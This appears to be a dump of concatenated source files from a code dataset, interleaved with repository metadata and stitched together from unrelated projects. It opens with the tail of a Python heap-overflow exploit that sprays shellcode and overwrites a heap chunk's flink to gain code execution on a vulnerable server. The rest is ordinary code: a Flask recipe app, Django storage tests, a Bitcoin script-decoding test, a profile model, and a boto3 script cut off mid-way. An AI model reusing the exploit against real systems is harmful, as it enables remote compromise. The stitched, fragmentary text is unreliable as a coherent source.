"\x3a\x53\xc6\x29\x74\x4b\x6d\x75\xa5\x6a\xa2\x65\x99\x25\xcf"
"\x5e\x69\xb4\x19\xaf\x92\x86\x65\x7c\xad\x26\x68\x7c\xe9\x81"
"\x92\x0b\x01\xf2\x2f\x0c\xd2\x88\xeb\x99\xc7\x2b\x78\x39\x2c"
"\xcd\xad\xdc\xa7\xc1\x1a\xaa\xe0\xc5\x9d\x7f\x9b\xf2\x16\x7e"
"\x4c\x73\x6c\xa5\x48\xdf\x37\xc4\xc9\x85\x96\xf9\x0a\x61\x47"
"\x5c\x40\x80\x9c\xe6\x0b\xcd\x51\xd5\xb3\x0d\xfd\x6e\xc7\x3f"
"\xa2\xc4\x4f\x0c\x2b\xc3\x88\x73\x06\xb3\x07\x8a\xa8\xc4\x0e"
"\x49\xfc\x94\x38\x78\x7c\x7f\xb9\x85\xa9\xd0\xe9\x29\x01\x91"
"\x59\x8a\xf1\x79\xb0\x05\x2e\x99\xbb\xcf\x59\x9d\x75\x2b\x0a"
"\x4a\x74\xcb\xbd\xd6\xf1\x2d\xd7\xf6\x57\xe5\x4f\x35\x8c\x3e"
"\xe8\x46\xe6\x12\xa1\xd0\xbe\x7c\x75\xde\x3e\xab\xd6\x73\x96"
"\x3c\xac\x9f\x23\x5c\xb3\xb5\x03\x17\x8c\x5e\xd9\x49\x5f\xfe"
"\xde\x43\x37\x63\x4c\x08\xc7\xea\x6d\x87\x90\xbb\x40\xde\x74"
"\x56\xfa\x48\x6a\xab\x9a\xb3\x2e\x70\x5f\x3d\xaf\xf5\xdb\x19"
"\xbf\xc3\xe4\x25\xeb\x9b\xb2\xf3\x45\x5a\x6d\xb2\x3f\x34\xc2"
"\x1c\xd7\xc1\x28\x9f\xa1\xcd\x64\x69\x4d\x7f\xd1\x2c\x72\xb0"
"\xb5\xb8\x0b\xac\x25\x46\xc6\x74\x55\x0d\x4a\xdc\xfe\xc8\x1f"
"\x5c\x63\xeb\xca\xa3\x9a\x68\xfe\x5b\x59\x70\x8b\x5e\x25\x36"
"\x60\x13\x36\xd3\x86\x80\x37\xf6"
)
shellcode = hexlify(shellcode) # encode shellcode
print "%s" % s.recv(1024)
# 0) Spray the shellcode
for i in range(20):
payload = " deadbeef" + "20" + "90"*(2039 - len(shellcode)/2) + shellcode
s.sendall("HTER " + payload)
print "%s" % s.recv(1024)
# 1) Allocate chunk A
s.sendall("KSTET " + "A"*8 + "\x00")
print "%s" % s.recv(1024)
# 2) Allocate and free chunk B
s.sendall("GMON " + "A"*8 + "\x00")
print "%s" % s.recv(1024)
# 3) Overflow chunk A and overwrite chunk B's flink
s.sendall("GTER " + "A"*8 + "B"*8 + target)
print "%s" % s.recv(1024)
# 4) Allocate chunk B and chunk C. Overwrite the target.
s.sendall("STATS " + scaddr)
print "%s" % s.recv(1024)
# 5) Trigger the shellcode
s.sendall("HELP" + "\x00")
s.close()
| 35.686747
| 77
| 0.695138
|
258b4f782c0334030c92b8dc80907b23316e4970
| 1,246
|
py
|
Python
|
recipebox/__init__.py
|
Caffrey-Hill/recipebox
|
e67f478f390c50f1bd7e46ab589564eac8379a23
|
[
"MIT"
] | null | null | null |
recipebox/__init__.py
|
Caffrey-Hill/recipebox
|
e67f478f390c50f1bd7e46ab589564eac8379a23
|
[
"MIT"
] | 2
|
2020-12-26T14:29:51.000Z
|
2020-12-26T14:30:19.000Z
|
recipebox/__init__.py
|
Caffrey-Hill/recipebox
|
e67f478f390c50f1bd7e46ab589564eac8379a23
|
[
"MIT"
] | null | null | null |
from flask import Flask, render_template
def create_app(config=None):
app = Flask(__name__)
if isinstance(config, dict):
for key in config:
app.config[key] = config[key]
app.config.from_object('recipebox.default_settings')
app.config.from_envvar('RECIPEBOX_SETTINGS', silent=True)
from .models import db
db.init_app(app)
from .recipes import recipes
app.register_blueprint(recipes, url_prefix="/recipes")
from .groceries import groceries
app.register_blueprint(groceries, url_prefix="/groceries")
from .meal_plan import meal_plan
app.register_blueprint(meal_plan, url_prefix="/meal_plan")
from .inventory import inventory
app.register_blueprint(inventory, url_prefix="/inventory")
from .api import api
app.register_blueprint(api, url_prefix="/api")
@app.route("/")
def index():
return render_template("welcome.html")
@app.errorhandler(400)
@app.errorhandler(401)
@app.errorhandler(403)
@app.errorhandler(404)
@app.errorhandler(500)
def handle_error(error):
return render_template("error.html", error=error), error.code
from .cli import init_db
app.cli.add_command(init_db)
return app
| 28.318182
| 69
| 0.696629
|
1151805592bc989c97a94f47c654eb62045727f9
| 2,900
|
py
|
Python
|
tests/tests/test_helpers.py
|
barberscore/django-cloudinary-storage
|
e339bec0209ebb636c5f28ddae78f22340dd86ce
|
[
"MIT"
] | 1
|
2017-08-07T15:46:35.000Z
|
2017-08-07T15:46:35.000Z
|
tests/tests/test_helpers.py
|
barberscore/django-cloudinary-storage
|
e339bec0209ebb636c5f28ddae78f22340dd86ce
|
[
"MIT"
] | null | null | null |
tests/tests/test_helpers.py
|
barberscore/django-cloudinary-storage
|
e339bec0209ebb636c5f28ddae78f22340dd86ce
|
[
"MIT"
] | null | null | null |
import errno
import os
from io import StringIO
from uuid import uuid4
from cloudinary_storage import app_settings
from cloudinary_storage.management.commands.deleteorphanedmedia import \
Command as DeleteOrphanedMediaCommand
from cloudinary_storage.storage import (HashedFilesMixin,
MediaCloudinaryStorage,
StaticHashedCloudinaryStorage)
from django.core.files import File
from django.core.management import call_command
from django.utils import version
def get_random_name():
return str(uuid4())
def set_media_tag(tag):
MediaCloudinaryStorage.TAG = tag
DeleteOrphanedMediaCommand.TAG = tag
app_settings.MEDIA_TAG = tag
def execute_command(*args):
out = StringIO()
call_command(*args, stdout=out)
return out.getvalue()
class StaticHashedStorageTestsMixin(object):
@classmethod
def setUpClass(cls):
StaticHashedCloudinaryStorage.manifest_name = get_random_name()
hash_mixin = HashedFilesMixin()
content = File(open(os.path.join('tests', 'static', 'tests', 'css', 'style.css'), 'rb'))
cls.style_hash = hash_mixin.file_hash('tests/css/style.css', content)
content.close()
content = File(open(os.path.join('tests', 'static', 'tests', 'images', 'dummy-static-image.jpg'), 'rb'))
cls.image_hash = hash_mixin.file_hash('tests/images/dummy-static-image.jpg', content)
content.close()
name = StaticHashedCloudinaryStorage.manifest_name
cls.manifest_path = os.path.join(app_settings.STATICFILES_MANIFEST_ROOT, name)
super(StaticHashedStorageTestsMixin, cls).setUpClass()
@classmethod
def tearDownClass(cls):
try:
os.remove(cls.manifest_path)
except (IOError, OSError) as e:
if e.errno != errno.ENOENT:
raise
super(StaticHashedStorageTestsMixin, cls).tearDownClass()
StaticHashedCloudinaryStorage.manifest_name = 'staticfiles.json'
def import_mock():
try:
from unittest import mock
except ImportError:
import mock
finally:
return mock
def get_save_calls_counter_in_postprocess_of_adjustable_file():
"""
Since Django 1.11, postprocess algorythm has been changed for css files
is such a way that they save is called 4 times total.
It must be taken into consideration in unittests.
Hopefully this will be removed at some point once Django introduces optimization
of postprocess handler.
"""
if version.get_complete_version() >= (1, 11):
return 4
return 1
def get_postprocess_counter_of_adjustable_file():
"""
Since Django 1.11, postprocess algorythm has been changed for css files
is such a way that they are postprocessed twice.
"""
if version.get_complete_version() >= (1, 11):
return 2
return 1
| 32.58427
| 112
| 0.692069
|
7ad7e1ba5ac268996b399982bbd29956272ca6df
| 356
|
py
|
Python
|
ampel/base/BadConfig.py
|
AmpelProject/Ampel-interface
|
3c272565c6817555e5a350f12c7d0e11f7d46bb9
|
[
"BSD-3-Clause"
] | null | null | null |
ampel/base/BadConfig.py
|
AmpelProject/Ampel-interface
|
3c272565c6817555e5a350f12c7d0e11f7d46bb9
|
[
"BSD-3-Clause"
] | 8
|
2019-12-26T22:44:41.000Z
|
2021-12-15T12:06:42.000Z
|
ampel/base/BadConfig.py
|
AmpelProject/Ampel-interface
|
3c272565c6817555e5a350f12c7d0e11f7d46bb9
|
[
"BSD-3-Clause"
] | 1
|
2020-01-20T14:01:38.000Z
|
2020-01-20T14:01:38.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# File : Ampel-interface/ampel/base/BadConfig.py
# License : BSD-3-Clause
# Author : vb <vbrinnel@physik.hu-berlin.de>
# Date : 17.02.2021
# Last Modified Date: 17.02.2021
# Last Modified By : vb <vbrinnel@physik.hu-berlin.de>
class BadConfig(Exception):
pass
| 29.666667
| 61
| 0.603933
|
0849a9a6c803a42d19fdbc61f5ab49cdf242acf2
| 1,913
|
py
|
Python
|
ssseg/modules/datasets/sbushadow.py
|
zhizhangxian/sssegmentation
|
90613f6e0abf4cdd729cf382ab2a915e106d8649
|
[
"MIT"
] | 411
|
2020-10-22T02:24:57.000Z
|
2022-03-31T11:19:17.000Z
|
ssseg/modules/datasets/sbushadow.py
|
zhizhangxian/sssegmentation
|
90613f6e0abf4cdd729cf382ab2a915e106d8649
|
[
"MIT"
] | 24
|
2020-12-21T03:53:54.000Z
|
2022-03-17T06:50:00.000Z
|
ssseg/modules/datasets/sbushadow.py
|
zhizhangxian/sssegmentation
|
90613f6e0abf4cdd729cf382ab2a915e106d8649
|
[
"MIT"
] | 59
|
2020-12-04T03:40:12.000Z
|
2022-03-30T09:12:47.000Z
|
'''
Function:
load the sbu-shadow dataset
Author:
Zhenchao Jin
'''
import os
from .base import *
'''sbu-shadow dataset'''
class SBUShadowDataset(BaseDataset):
num_classes = 2
classnames = ['__backgroud__', 'shadow']
def __init__(self, mode, logger_handle, dataset_cfg, **kwargs):
super(SBUShadowDataset, self).__init__(mode, logger_handle, dataset_cfg, **kwargs)
# obtain the dirs
setmap_dict = {'train': 'SBUTrain4KRecoveredSmall', 'val': 'SBU-Test'}
rootdir = dataset_cfg['rootdir']
self.image_dir = os.path.join(rootdir, setmap_dict[dataset_cfg['set']], 'ShadowImages')
self.ann_dir = os.path.join(rootdir, setmap_dict[dataset_cfg['set']], 'ShadowMasks')
# obatin imageids
self.imageids = []
for line in open(os.path.join(rootdir, dataset_cfg['set']+'.txt'), 'r').readlines():
if line.strip(): self.imageids.append(line.strip())
self.imageids = [str(_id) for _id in self.imageids]
'''pull item'''
def __getitem__(self, index):
imageid = self.imageids[index]
imagepath = os.path.join(self.image_dir, imageid+'.jpg')
annpath = os.path.join(self.ann_dir, imageid+'.png')
sample = self.read(imagepath, annpath, self.dataset_cfg.get('with_ann', True))
sample.update({'id': imageid})
if self.mode == 'TRAIN':
sample['segmentation'][sample['segmentation'] > 0] = 1.
sample = self.synctransform(sample, 'without_totensor_normalize_pad')
sample['edge'] = self.generateedge(sample['segmentation'].copy())
sample = self.synctransform(sample, 'only_totensor_normalize_pad')
else:
sample['groundtruth'][sample['groundtruth'] > 0] = 1.
sample = self.synctransform(sample, 'all')
return sample
'''length'''
def __len__(self):
return len(self.imageids)
| 42.511111
| 95
| 0.632514
|
5b1514af6f18c650eaffd786d782be82fa3ccef9
| 16,557
|
py
|
Python
|
test/functional/rpc_decodescript.py
|
crptec/sinovate
|
345a81f99ec7e624e0ec244a7dbe1ebb3698c347
|
[
"MIT"
] | 213
|
2015-01-25T19:45:22.000Z
|
2022-02-24T22:48:03.000Z
|
test/functional/rpc_decodescript.py
|
crptec/sinovate
|
345a81f99ec7e624e0ec244a7dbe1ebb3698c347
|
[
"MIT"
] | 51
|
2019-11-03T04:00:14.000Z
|
2022-03-30T07:17:34.000Z
|
test/functional/rpc_decodescript.py
|
crptec/sinovate
|
345a81f99ec7e624e0ec244a7dbe1ebb3698c347
|
[
"MIT"
] | 32
|
2015-05-12T17:42:55.000Z
|
2022-01-26T11:02:51.000Z
|
#!/usr/bin/env python3
# Copyright (c) 2015-2019 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test decoding scripts via decodescript RPC command."""
from test_framework.messages import (
sha256,
tx_from_hex,
)
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
assert_equal,
)
class DecodeScriptTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
def decodescript_script_sig(self):
signature = '304502207fa7a6d1e0ee81132a269ad84e68d695483745cde8b541e3bf630749894e342a022100c1f7ab20e13e22fb95281a870f3dcf38d782e53023ee313d741ad0cfbc0c509001'
push_signature = '48' + signature
public_key = '03b0da749730dc9b4b1f4a14d6902877a92541f5368778853d9c4a0cb7802dcfb2'
push_public_key = '21' + public_key
# below are test cases for all of the standard transaction types
# 1) P2PK scriptSig
# the scriptSig of a public key scriptPubKey simply pushes a signature onto the stack
rpc_result = self.nodes[0].decodescript(push_signature)
assert_equal(signature, rpc_result['asm'])
# 2) P2PKH scriptSig
rpc_result = self.nodes[0].decodescript(push_signature + push_public_key)
assert_equal(signature + ' ' + public_key, rpc_result['asm'])
# 3) multisig scriptSig
# this also tests the leading portion of a P2SH multisig scriptSig
# OP_0 <A sig> <B sig>
rpc_result = self.nodes[0].decodescript('00' + push_signature + push_signature)
assert_equal('0 ' + signature + ' ' + signature, rpc_result['asm'])
# 4) P2SH scriptSig
# an empty P2SH redeemScript is valid and makes for a very simple test case.
# thus, such a spending scriptSig would just need to pass the outer redeemScript
# hash test and leave true on the top of the stack.
rpc_result = self.nodes[0].decodescript('5100')
assert_equal('1 0', rpc_result['asm'])
# 5) null data scriptSig - no such thing because null data scripts can not be spent.
# thus, no test case for that standard transaction type is here.
def decodescript_script_pub_key(self):
public_key = '03b0da749730dc9b4b1f4a14d6902877a92541f5368778853d9c4a0cb7802dcfb2'
push_public_key = '21' + public_key
public_key_hash = '5dd1d3a048119c27b28293056724d9522f26d945'
push_public_key_hash = '14' + public_key_hash
uncompressed_public_key = '04b0da749730dc9b4b1f4a14d6902877a92541f5368778853d9c4a0cb7802dcfb25e01fc8fde47c96c98a4f3a8123e33a38a50cf9025cc8c4494a518f991792bb7'
push_uncompressed_public_key = '41' + uncompressed_public_key
p2wsh_p2pk_script_hash = 'd8590cf8ea0674cf3d49fd7ca249b85ef7485dea62c138468bddeb20cd6519f7'
# below are test cases for all of the standard transaction types
# 1) P2PK scriptPubKey
# <pubkey> OP_CHECKSIG
rpc_result = self.nodes[0].decodescript(push_public_key + 'ac')
assert_equal(public_key + ' OP_CHECKSIG', rpc_result['asm'])
# P2PK is translated to P2WPKH
assert_equal('0 ' + public_key_hash, rpc_result['segwit']['asm'])
# 2) P2PKH scriptPubKey
# OP_DUP OP_HASH160 <PubKeyHash> OP_EQUALVERIFY OP_CHECKSIG
rpc_result = self.nodes[0].decodescript('76a9' + push_public_key_hash + '88ac')
assert_equal('OP_DUP OP_HASH160 ' + public_key_hash + ' OP_EQUALVERIFY OP_CHECKSIG', rpc_result['asm'])
# P2PKH is translated to P2WPKH
assert_equal('0 ' + public_key_hash, rpc_result['segwit']['asm'])
# 3) multisig scriptPubKey
# <m> <A pubkey> <B pubkey> <C pubkey> <n> OP_CHECKMULTISIG
# just imagine that the pub keys used below are different.
# for our purposes here it does not matter that they are the same even though it is unrealistic.
multisig_script = '52' + push_public_key + push_public_key + push_public_key + '53ae'
rpc_result = self.nodes[0].decodescript(multisig_script)
assert_equal('2 ' + public_key + ' ' + public_key + ' ' + public_key + ' 3 OP_CHECKMULTISIG', rpc_result['asm'])
# multisig in P2WSH
multisig_script_hash = sha256(bytes.fromhex(multisig_script)).hex()
assert_equal('0 ' + multisig_script_hash, rpc_result['segwit']['asm'])
# 4) P2SH scriptPubKey
# OP_HASH160 <Hash160(redeemScript)> OP_EQUAL.
# push_public_key_hash here should actually be the hash of a redeem script.
# but this works the same for purposes of this test.
rpc_result = self.nodes[0].decodescript('a9' + push_public_key_hash + '87')
assert_equal('OP_HASH160 ' + public_key_hash + ' OP_EQUAL', rpc_result['asm'])
# P2SH does not work in segwit secripts. decodescript should not return a result for it.
assert 'segwit' not in rpc_result
# 5) null data scriptPubKey
# use a signature look-alike here to make sure that we do not decode random data as a signature.
# this matters if/when signature sighash decoding comes along.
# would want to make sure that no such decoding takes place in this case.
signature_imposter = '48304502207fa7a6d1e0ee81132a269ad84e68d695483745cde8b541e3bf630749894e342a022100c1f7ab20e13e22fb95281a870f3dcf38d782e53023ee313d741ad0cfbc0c509001'
# OP_RETURN <data>
rpc_result = self.nodes[0].decodescript('6a' + signature_imposter)
assert_equal('OP_RETURN ' + signature_imposter[2:], rpc_result['asm'])
# 6) a CLTV redeem script. redeem scripts are in-effect scriptPubKey scripts, so adding a test here.
# OP_NOP2 is also known as OP_CHECKLOCKTIMEVERIFY.
# just imagine that the pub keys used below are different.
# for our purposes here it does not matter that they are the same even though it is unrealistic.
#
# OP_IF
# <receiver-pubkey> OP_CHECKSIGVERIFY
# OP_ELSE
# <lock-until> OP_CHECKLOCKTIMEVERIFY OP_DROP
# OP_ENDIF
# <sender-pubkey> OP_CHECKSIG
#
# lock until block 500,000
cltv_script = '63' + push_public_key + 'ad670320a107b17568' + push_public_key + 'ac'
rpc_result = self.nodes[0].decodescript(cltv_script)
assert_equal('OP_IF ' + public_key + ' OP_CHECKSIGVERIFY OP_ELSE 500000 OP_CHECKLOCKTIMEVERIFY OP_DROP OP_ENDIF ' + public_key + ' OP_CHECKSIG', rpc_result['asm'])
# CLTV script in P2WSH
cltv_script_hash = sha256(bytes.fromhex(cltv_script)).hex()
assert_equal('0 ' + cltv_script_hash, rpc_result['segwit']['asm'])
# 7) P2PK scriptPubKey
# <pubkey> OP_CHECKSIG
rpc_result = self.nodes[0].decodescript(push_uncompressed_public_key + 'ac')
assert_equal(uncompressed_public_key + ' OP_CHECKSIG', rpc_result['asm'])
# uncompressed pubkeys are invalid for checksigs in segwit scripts.
# decodescript should not return a P2WPKH equivalent.
assert 'segwit' not in rpc_result
# 8) multisig scriptPubKey with an uncompressed pubkey
# <m> <A pubkey> <B pubkey> <n> OP_CHECKMULTISIG
# just imagine that the pub keys used below are different.
# the purpose of this test is to check that a segwit script is not returned for bare multisig scripts
# with an uncompressed pubkey in them.
rpc_result = self.nodes[0].decodescript('52' + push_public_key + push_uncompressed_public_key +'52ae')
assert_equal('2 ' + public_key + ' ' + uncompressed_public_key + ' 2 OP_CHECKMULTISIG', rpc_result['asm'])
# uncompressed pubkeys are invalid for checksigs in segwit scripts.
# decodescript should not return a P2WPKH equivalent.
assert 'segwit' not in rpc_result
# 9) P2WPKH scriptpubkey
# 0 <PubKeyHash>
rpc_result = self.nodes[0].decodescript('00' + push_public_key_hash)
assert_equal('0 ' + public_key_hash, rpc_result['asm'])
# segwit scripts do not work nested into each other.
# a nested segwit script should not be returned in the results.
assert 'segwit' not in rpc_result
# 10) P2WSH scriptpubkey
# 0 <ScriptHash>
# even though this hash is of a P2PK script which is better used as bare P2WPKH, it should not matter
# for the purpose of this test.
rpc_result = self.nodes[0].decodescript('0020' + p2wsh_p2pk_script_hash)
assert_equal('0 ' + p2wsh_p2pk_script_hash, rpc_result['asm'])
# segwit scripts do not work nested into each other.
# a nested segwit script should not be returned in the results.
assert 'segwit' not in rpc_result
def decoderawtransaction_asm_sighashtype(self):
"""Test decoding scripts via RPC command "decoderawtransaction".
This test is in with the "decodescript" tests because they are testing the same "asm" script decodes.
"""
# this test case uses a random plain vanilla mainnet transaction with a single P2PKH input and output
tx = '0100000001696a20784a2c70143f634e95227dbdfdf0ecd51647052e70854512235f5986ca010000008a47304402207174775824bec6c2700023309a168231ec80b82c6069282f5133e6f11cbb04460220570edc55c7c5da2ca687ebd0372d3546ebc3f810516a002350cac72dfe192dfb014104d3f898e6487787910a690410b7a917ef198905c27fb9d3b0a42da12aceae0544fc7088d239d9a48f2828a15a09e84043001f27cc80d162cb95404e1210161536ffffffff0100e1f505000000001976a914eb6c6e0cdb2d256a32d97b8df1fc75d1920d9bca88ac00000000'
rpc_result = self.nodes[0].decoderawtransaction(tx)
assert_equal('304402207174775824bec6c2700023309a168231ec80b82c6069282f5133e6f11cbb04460220570edc55c7c5da2ca687ebd0372d3546ebc3f810516a002350cac72dfe192dfb[ALL] 04d3f898e6487787910a690410b7a917ef198905c27fb9d3b0a42da12aceae0544fc7088d239d9a48f2828a15a09e84043001f27cc80d162cb95404e1210161536', rpc_result['vin'][0]['scriptSig']['asm'])
# this test case uses a mainnet transaction that has a P2SH input and both P2PKH and P2SH outputs.
# it's from James D'Angelo's awesome introductory videos about multisig: https://www.youtube.com/watch?v=zIbUSaZBJgU and https://www.youtube.com/watch?v=OSA1pwlaypc
# verify that we have not altered scriptPubKey decoding.
tx = '01000000018d1f5635abd06e2c7e2ddf58dc85b3de111e4ad6e0ab51bb0dcf5e84126d927300000000fdfe0000483045022100ae3b4e589dfc9d48cb82d41008dc5fa6a86f94d5c54f9935531924602730ab8002202f88cf464414c4ed9fa11b773c5ee944f66e9b05cc1e51d97abc22ce098937ea01483045022100b44883be035600e9328a01b66c7d8439b74db64187e76b99a68f7893b701d5380220225bf286493e4c4adcf928c40f785422572eb232f84a0b83b0dea823c3a19c75014c695221020743d44be989540d27b1b4bbbcfd17721c337cb6bc9af20eb8a32520b393532f2102c0120a1dda9e51a938d39ddd9fe0ebc45ea97e1d27a7cbd671d5431416d3dd87210213820eb3d5f509d7438c9eeecb4157b2f595105e7cd564b3cdbb9ead3da41eed53aeffffffff02611e0000000000001976a914dc863734a218bfe83ef770ee9d41a27f824a6e5688acee2a02000000000017a9142a5edea39971049a540474c6a99edf0aa4074c588700000000'
rpc_result = self.nodes[0].decoderawtransaction(tx)
assert_equal('8e3730608c3b0bb5df54f09076e196bc292a8e39a78e73b44b6ba08c78f5cbb0', rpc_result['txid'])
assert_equal('0 3045022100ae3b4e589dfc9d48cb82d41008dc5fa6a86f94d5c54f9935531924602730ab8002202f88cf464414c4ed9fa11b773c5ee944f66e9b05cc1e51d97abc22ce098937ea[ALL] 3045022100b44883be035600e9328a01b66c7d8439b74db64187e76b99a68f7893b701d5380220225bf286493e4c4adcf928c40f785422572eb232f84a0b83b0dea823c3a19c75[ALL] 5221020743d44be989540d27b1b4bbbcfd17721c337cb6bc9af20eb8a32520b393532f2102c0120a1dda9e51a938d39ddd9fe0ebc45ea97e1d27a7cbd671d5431416d3dd87210213820eb3d5f509d7438c9eeecb4157b2f595105e7cd564b3cdbb9ead3da41eed53ae', rpc_result['vin'][0]['scriptSig']['asm'])
assert_equal('OP_DUP OP_HASH160 dc863734a218bfe83ef770ee9d41a27f824a6e56 OP_EQUALVERIFY OP_CHECKSIG', rpc_result['vout'][0]['scriptPubKey']['asm'])
assert_equal('OP_HASH160 2a5edea39971049a540474c6a99edf0aa4074c58 OP_EQUAL', rpc_result['vout'][1]['scriptPubKey']['asm'])
txSave = tx_from_hex(tx)
# make sure that a specifically crafted op_return value will not pass all the IsDERSignature checks and then get decoded as a sighash type
tx = '01000000015ded05872fdbda629c7d3d02b194763ce3b9b1535ea884e3c8e765d42e316724020000006b48304502204c10d4064885c42638cbff3585915b322de33762598321145ba033fc796971e2022100bb153ad3baa8b757e30a2175bd32852d2e1cb9080f84d7e32fcdfd667934ef1b012103163c0ff73511ea1743fb5b98384a2ff09dd06949488028fd819f4d83f56264efffffffff0200000000000000000b6a0930060201000201000180380100000000001976a9141cabd296e753837c086da7a45a6c2fe0d49d7b7b88ac00000000'
rpc_result = self.nodes[0].decoderawtransaction(tx)
assert_equal('OP_RETURN 300602010002010001', rpc_result['vout'][0]['scriptPubKey']['asm'])
# verify that we have not altered scriptPubKey processing even of a specially crafted P2PKH pubkeyhash and P2SH redeem script hash that is made to pass the der signature checks
tx = '01000000018d1f5635abd06e2c7e2ddf58dc85b3de111e4ad6e0ab51bb0dcf5e84126d927300000000fdfe0000483045022100ae3b4e589dfc9d48cb82d41008dc5fa6a86f94d5c54f9935531924602730ab8002202f88cf464414c4ed9fa11b773c5ee944f66e9b05cc1e51d97abc22ce098937ea01483045022100b44883be035600e9328a01b66c7d8439b74db64187e76b99a68f7893b701d5380220225bf286493e4c4adcf928c40f785422572eb232f84a0b83b0dea823c3a19c75014c695221020743d44be989540d27b1b4bbbcfd17721c337cb6bc9af20eb8a32520b393532f2102c0120a1dda9e51a938d39ddd9fe0ebc45ea97e1d27a7cbd671d5431416d3dd87210213820eb3d5f509d7438c9eeecb4157b2f595105e7cd564b3cdbb9ead3da41eed53aeffffffff02611e0000000000001976a914301102070101010101010102060101010101010188acee2a02000000000017a91430110207010101010101010206010101010101018700000000'
rpc_result = self.nodes[0].decoderawtransaction(tx)
assert_equal('OP_DUP OP_HASH160 3011020701010101010101020601010101010101 OP_EQUALVERIFY OP_CHECKSIG', rpc_result['vout'][0]['scriptPubKey']['asm'])
assert_equal('OP_HASH160 3011020701010101010101020601010101010101 OP_EQUAL', rpc_result['vout'][1]['scriptPubKey']['asm'])
# some more full transaction tests of varying specific scriptSigs. used instead of
# tests in decodescript_script_sig because the decodescript RPC is specifically
# for working on scriptPubKeys (argh!).
push_signature = txSave.vin[0].scriptSig.hex()[2:(0x48*2+4)]
signature = push_signature[2:]
der_signature = signature[:-2]
signature_sighash_decoded = der_signature + '[ALL]'
signature_2 = der_signature + '82'
push_signature_2 = '48' + signature_2
signature_2_sighash_decoded = der_signature + '[NONE|ANYONECANPAY]'
# 1) P2PK scriptSig
txSave.vin[0].scriptSig = bytes.fromhex(push_signature)
rpc_result = self.nodes[0].decoderawtransaction(txSave.serialize().hex())
assert_equal(signature_sighash_decoded, rpc_result['vin'][0]['scriptSig']['asm'])
# make sure that the sighash decodes come out correctly for a more complex / lesser used case.
txSave.vin[0].scriptSig = bytes.fromhex(push_signature_2)
rpc_result = self.nodes[0].decoderawtransaction(txSave.serialize().hex())
assert_equal(signature_2_sighash_decoded, rpc_result['vin'][0]['scriptSig']['asm'])
# 2) multisig scriptSig
txSave.vin[0].scriptSig = bytes.fromhex('00' + push_signature + push_signature_2)
rpc_result = self.nodes[0].decoderawtransaction(txSave.serialize().hex())
assert_equal('0 ' + signature_sighash_decoded + ' ' + signature_2_sighash_decoded, rpc_result['vin'][0]['scriptSig']['asm'])
# 3) test a scriptSig that contains more than push operations.
# in fact, it contains an OP_RETURN with data specially crafted to cause improper decode if the code does not catch it.
txSave.vin[0].scriptSig = bytes.fromhex('6a143011020701010101010101020601010101010101')
rpc_result = self.nodes[0].decoderawtransaction(txSave.serialize().hex())
assert_equal('OP_RETURN 3011020701010101010101020601010101010101', rpc_result['vin'][0]['scriptSig']['asm'])
def run_test(self):
self.decodescript_script_sig()
self.decodescript_script_pub_key()
self.decoderawtransaction_asm_sighashtype()
if __name__ == '__main__':
DecodeScriptTest().main()
| 69.567227
| 761
| 0.7569
|
2f9ba0db3279aaeca12fd97f17f6dfa20066cc10
| 2,789
|
py
|
Python
|
src/tunewhale/profile/models.py
|
mariaaprilrose/fuck
|
f6b081ce3d6bdc59c9da3da2e7e70a5e36a560f1
|
[
"BSD-3-Clause"
] | null | null | null |
src/tunewhale/profile/models.py
|
mariaaprilrose/fuck
|
f6b081ce3d6bdc59c9da3da2e7e70a5e36a560f1
|
[
"BSD-3-Clause"
] | 1
|
2015-07-15T06:18:34.000Z
|
2015-07-15T06:18:49.000Z
|
src/tunewhale/profile/models.py
|
mariaaprilrose/fuck
|
f6b081ce3d6bdc59c9da3da2e7e70a5e36a560f1
|
[
"BSD-3-Clause"
] | null | null | null |
import os
from django.conf import settings
from django.db import models
from django.contrib.auth.models import User
def update_avatar_filename(instance, filename):
extension = filename.split('.')[-1]
filename = '{0}.{1}'.format('avatar', extension)
path = '{0}{1}'.format(settings.USER_UPLOAD_PATH,
instance.user.username)
return os.path.join(path, filename)
def update_cover_filename(instance, filename):
extension = filename.split('.')[-1]
filename = '{0}.{1}'.format('cover', extension)
path = '{0}{1}'.format(settings.USER_UPLOAD_PATH,
instance.user.username)
return os.path.join(path, filename)
class UserProfile(models.Model):
user = models.OneToOneField(User)
date_registered = models.DateField(auto_now_add=True)
location = models.CharField(max_length=50, blank=True)
status = models.ImageField(upload_to=settings.STATUS_UPLOAD_PATH,
default=settings.BABYWHALE_IMG_PATH)
music_interests = models.TextField(blank=True)
music_genres = models.TextField(blank=True)
best_song_ever = models.CharField(max_length=100, blank=True)
bio = models.TextField(blank=True)
avatar = models.ImageField(upload_to=update_avatar_filename,
default=settings.DEFAULT_AVATAR_PATH)
cover = models.ImageField(upload_to=update_cover_filename,
default=settings.DEFAULT_COVER_PATH)
followers = models.ManyToManyField(User, blank=True,
related_name='followers')
following = models.ManyToManyField(User, blank=True,
related_name='following')
def __unicode__(self):
return self.user.username
def get_avatar_url(self):
filename = self.avatar.url.split('/')
new_filename = ''
for w in filename[2:]:
new_filename += w + '/'
return new_filename
def get_cover_url(self):
filename = self.cover.url.split('/')
new_filename = ''
for w in filename[2:]:
new_filename += w + '/'
return new_filename
def get_status_url(self):
filename = self.status.url.split('/')
new_filename = ''
for w in filename[2:]:
new_filename += w + '/'
return new_filename
def followers_count(self):
# possible additions in the future:
# - display numbers with commas, e.g. 15,000
# - as of now, the template can only display 8 digits with commas, 9 digits without commas
# - display millions (and higher) with letter, e.g. 1.2M, 15M
count = 0
for user in self.followers.all():
count += 1
return count
| 42.257576
| 100
| 0.621011
|
288da210651d5f7d8193354cb24fe917bdf025cd
| 567
|
py
|
Python
|
grapl-cdk/delete_log_groups.py
|
Seabreg/grapl
|
8316cda9996bea051b77cb5a7b892113b8a2b0e3
|
[
"Apache-2.0"
] | null | null | null |
grapl-cdk/delete_log_groups.py
|
Seabreg/grapl
|
8316cda9996bea051b77cb5a7b892113b8a2b0e3
|
[
"Apache-2.0"
] | null | null | null |
grapl-cdk/delete_log_groups.py
|
Seabreg/grapl
|
8316cda9996bea051b77cb5a7b892113b8a2b0e3
|
[
"Apache-2.0"
] | null | null | null |
import json
import boto3
cwlogs = boto3.client('logs')
loglist = cwlogs.describe_log_groups(
logGroupNamePrefix='engagement'
)
#writes json output to file...
